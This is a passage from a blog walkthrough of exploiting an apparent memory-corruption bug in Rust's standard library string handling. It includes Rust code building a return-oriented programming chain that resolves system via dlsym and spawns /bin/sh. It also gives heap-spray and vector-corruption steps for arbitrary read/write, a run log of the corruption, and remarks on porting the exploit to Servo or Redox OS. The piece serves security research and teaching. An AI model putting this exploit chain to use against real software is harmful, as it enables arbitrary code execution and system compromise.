Hang tight, we are almost done. Now we simply need to corrupt a function pointer, a return address, etc., to control execution (and then gain arbitrary code execution / system() using ROP/JOP). Because this is an example exploit we will jump to system and end this, but in reality we would probably need to jump to mprotect and execute a payload. Due to RELRO over the GOT, we can’t easily corrupt the function pointers there. We could go for function pointers at known addresses, such as the equivalents of malloc_hook/etc in jemalloc, but we don’t need to go that far. Nothing checks the integrity of return addresses on the stack (on Intel/AMD; on aarch64, PAC of course makes this harder). Let’s use our absolute write to corrupt a return address on the stack and continue from there with a trivial ROP chain.
Note: I didn’t want to rely on offsets in different libc versions, so I relied only on offsets in my binary. So, I took advantage of the fact that dlsym is always in the binary, and in the ROP, I simply did:
Write the string “system\x00” to a known address
Write the string “/bin/sh\x00” to a known address
dlsym(NULL, “system”)
system(“/bin/sh\x00”)
ROP chain:
println!("[*corrupt*]\tstack addr @ {:#x}, ret_addr @ {:#x}", stack_addr, ret_addr);
// set up the strings I need
do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, BIN_SH_STR, 0x0068732f6e69622f);
do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, SYSTEM, 0x006d6574737973);
// build the ROP on the stack
do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*0, main_addr + pop_rdi_ret_off + 1); // make stack aligned for movaps
do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*1, main_addr + pop_rdi_ret_off);
do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*2, 0); // handle = NULL;
do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*3, main_addr + pop_rsi_ret_off);
do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*4, SYSTEM);
do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*5, dlsym_addr);
do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*6, main_addr + pop_rdi_jmp_rax_off);
do_arbitrary_write(allocs, corrupted_vec, target_vec, target_idx, ret_addr+0x8*7, BIN_SH_STR);
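The two magic constants written at the start of the chain are just the strings packed into little-endian 64-bit words. A short sketch, with pack_cstr being a helper name I made up, shows how they can be derived instead of typed by hand:

```rust
/// Hypothetical helper: packs up to 7 bytes plus a NUL terminator into one
/// little-endian u64, the form the write primitive takes.
fn pack_cstr(s: &[u8]) -> u64 {
    assert!(s.len() < 8, "need room for the terminating NUL");
    let mut bytes = [0u8; 8];
    bytes[..s.len()].copy_from_slice(s);
    u64::from_le_bytes(bytes)
}

fn main() {
    println!("/bin/sh -> {:#018x}", pack_cstr(b"/bin/sh"));
    println!("system  -> {:#018x}", pack_cstr(b"system"));
}
```

Because each string fits in 8 bytes including its terminator, a single 8-byte write per string is enough.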
To sum it all up:
Spray huge allocations, up to the point the allocator uses the address we picked
Those allocations contain many vectors
Allocate same-size large string to start the wildcopy from, it falls before the vector allocations
Corrupt some vector with the same address we picked
Find this vector, and use relative read to scan forward and find another vector
Corrupt the second vector’s raw pointer, and use it for an arbitrary read/write
POC:
Before publishing this blog post I showed this exploit to my good friend Tomash. He proposed to try out higher Unicode codepoints, even though Rust complains specifically about the range [0x00, 0x7f]. Check out what happens when we use a different string that requires multibyte characters in UTF-8 and trigger the wildcopy with it. The vector.length is corrupted with this value:
amarsa@SaarAmar-book2:/mnt/c/projects/rust/exploit$ cargo run
Compiling exploit v0.1.0 (file:///mnt/c/projects/rust/exploit)
Finished dev [unoptimized + debuginfo] target(s) in 3.75s
Running `target/debug/exploit`
[*start*] Let the fun begin!
[*shape*] shape: spraying vectors
[*shape*] shape: done spraying vectors
[*vuln*] trigger_vulnerability
[*scan*] start checking vectors
[*scan*] vec corrupted! allocs[9997][0].len() == 0x90d790d790d790d7
[*scan*] done checking vectors
With this we should be able to implement an arbitrary read/write on the whole userspace range using a single vector instead of two, no problems. The exploit already works with the two vectors, so I figured I’d just drop the other approach here for completeness :)
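The value in that log is easy to reproduce with safe code. The string actually used is not shown here, so the code point below is my assumption: U+05D0 is one character whose UTF-8 encoding (d7 90) matches the corrupted length. The helper first_word is likewise a name of my own.

```rust
/// Interprets the first 8 bytes of `s` as a little-endian u64, the way a
/// length field overwritten by the repeated string would be read.
fn first_word(s: &str) -> Option<u64> {
    let bytes = s.as_bytes();
    if bytes.len() < 8 {
        return None;
    }
    let mut word = [0u8; 8];
    word.copy_from_slice(&bytes[..8]);
    Some(u64::from_le_bytes(word))
}

fn main() {
    // Assumption: U+05D0 encodes as the two bytes d7 90 in UTF-8.
    let pattern = "\u{5d0}".repeat(4);
    println!("bytes = {:02x?}", pattern.as_bytes());
    println!("word  = {:#x}", first_word(&pattern).unwrap());
}
```

So a perfectly valid Rust string can carry bytes above 0x7f, as long as they form well-formed UTF-8 sequences.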
It’s interesting to note that since this vulnerability is in the standard library, it breaks an assumption many products make when working with strings. I was thinking about porting this exploit to Servo (in an RCE flow) or to Redox OS (in an LPE flow). I didn’t get time to play with it, but it might be interesting to check it out.
I hope you enjoyed this exploitation walkthrough and the additional information on how to deal with non-trivial vulnerabilities such as this one. The exploit code is in this repo, here :)